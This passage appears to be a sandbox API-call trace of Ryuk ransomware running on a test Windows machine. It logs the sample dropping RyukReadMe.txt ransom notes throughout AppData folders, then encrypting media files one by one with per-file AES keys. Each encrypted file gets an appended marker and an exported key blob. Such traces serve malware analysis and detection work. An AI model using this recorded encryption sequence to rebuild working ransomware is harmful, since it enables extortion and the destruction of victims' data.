nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0148.836] CloseHandle (hObject=0x190) returned 1 [0148.836] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0148.837] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0148.837] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0148.837] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0148.837] SetLastError (dwErrCode=0x0) [0148.837] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\identities\\{31810c36-5d23-4cce-a3b4-316ded195c38}\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0148.837] GetLastError () returned 0x0 [0148.837] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0148.838] CloseHandle (hObject=0x190) returned 1 [0148.839] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0148.839] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0148.839] SetLastError (dwErrCode=0x0) [0148.839] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\identities\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0148.839] GetLastError () returned 0xb7 [0148.840] CloseHandle (hObject=0x18c) returned 1 [0148.840] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0148.840] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0148.840] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\kXFQEGM.m4a", dwFileAttributes=0x80) returned 1 [0148.840] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\kXFQEGM.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\kxfqegm.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0148.840] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=26428) returned 1 [0148.840] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=26428) returned 1 [0148.840] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x661a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.840] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0148.841] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.841] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0148.841] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0148.841] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.841] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x673c, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x673c, lpOverlapped=0x0) returned 1 [0148.842] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0148.842] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x673c, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x6740) returned 1 [0148.842] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.842] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x6740, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x6740, lpOverlapped=0x0) returned 1 [0148.842] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0148.842] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0148.842] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0148.842] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0148.842] CloseHandle (hObject=0x18c) returned 1 [0148.860] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.864] CryptDestroyKey (hKey=0x3b8690) returned 1 [0148.864] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.865] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0148.865] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0148.865] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\KZgj.mkv", dwFileAttributes=0x80) returned 1 [0148.865] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\KZgj.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\kzgj.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0148.865] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=92317) returned 1 [0148.865] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=92317) returned 1 [0148.865] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x1677b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.865] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0148.866] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.866] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0148.866] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0148.866] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.866] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1689d, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x1689d, lpOverlapped=0x0) returned 1 [0148.867] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0148.867] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x1689d, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x168a0) returned 1 [0148.868] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.868] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x168a0, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x168a0, lpOverlapped=0x0) returned 1 [0148.868] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0148.868] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0148.868] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0148.869] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0148.869] CloseHandle (hObject=0x18c) returned 1 [0148.884] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.889] CryptDestroyKey (hKey=0x3b8690) returned 1 [0148.889] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.889] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0148.889] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0148.889] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\LebYag.png", dwFileAttributes=0x80) returned 1 [0148.890] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\LebYag.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lebyag.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0148.890] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=86778) returned 1 [0148.890] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=86778) returned 1 [0148.890] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x151d8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.890] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0148.890] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.890] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0148.890] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0148.891] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.891] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x152fa, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x152fa, lpOverlapped=0x0) returned 1 [0148.892] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0148.892] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x152fa, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x15300) returned 1 [0148.893] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.893] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x15300, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x15300, lpOverlapped=0x0) returned 1 [0148.893] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0148.893] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0148.893] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0148.893] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0148.893] CloseHandle (hObject=0x18c) returned 1 [0148.909] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.913] CryptDestroyKey (hKey=0x3b8690) returned 1 [0148.913] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.913] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0148.913] SetLastError (dwErrCode=0x0) [0148.913] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0148.913] GetLastError () returned 0xb7 [0148.913] CloseHandle (hObject=0x18c) returned 1 [0148.913] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0148.914] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0148.914] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0148.914] SetLastError (dwErrCode=0x0) [0148.914] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0148.915] GetLastError () returned 0x0 [0148.915] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0148.915] CloseHandle (hObject=0x190) returned 1 [0148.916] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0148.916] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0148.916] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0148.916] SetLastError (dwErrCode=0x0) [0148.916] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0148.918] GetLastError () returned 0x0 [0148.918] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0148.919] CloseHandle (hObject=0x194) returned 1 [0148.919] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0148.919] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0148.919] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0148.919] SetLastError (dwErrCode=0x0) [0148.919] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0148.920] GetLastError () returned 0x0 [0148.920] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0148.921] CloseHandle (hObject=0x198) returned 1 [0148.921] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0148.922] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0148.922] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0148.922] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0148.922] SetLastError (dwErrCode=0x0) [0148.922] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\p7y3f7qb\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0148.922] GetLastError () returned 0x0 [0148.922] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0148.923] CloseHandle (hObject=0x198) returned 1 [0148.923] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0148.923] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0148.924] SetLastError (dwErrCode=0x0) [0148.924] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0148.924] GetLastError () returned 0xb7 [0148.924] CloseHandle (hObject=0x194) returned 1 [0148.924] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0148.924] SetLastError (dwErrCode=0x0) [0148.924] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0148.924] GetLastError () returned 0xb7 [0148.924] CloseHandle (hObject=0x194) returned 1 [0148.924] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0148.924] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0148.924] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0148.924] SetLastError (dwErrCode=0x0) [0148.924] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0148.931] GetLastError () returned 0x0 [0148.931] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0148.932] CloseHandle (hObject=0x198) returned 1 [0148.933] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0148.933] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0148.933] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0148.933] SetLastError (dwErrCode=0x0) [0148.933] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0148.933] GetLastError () returned 0x0 [0148.933] WriteFile (in: hFile=0x19c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aab80*=0x320, lpOverlapped=0x0) returned 1 [0148.934] CloseHandle (hObject=0x19c) returned 1 [0148.935] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a3000 [0148.935] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0148.935] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0148.935] SetLastError (dwErrCode=0x0) [0148.935] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash 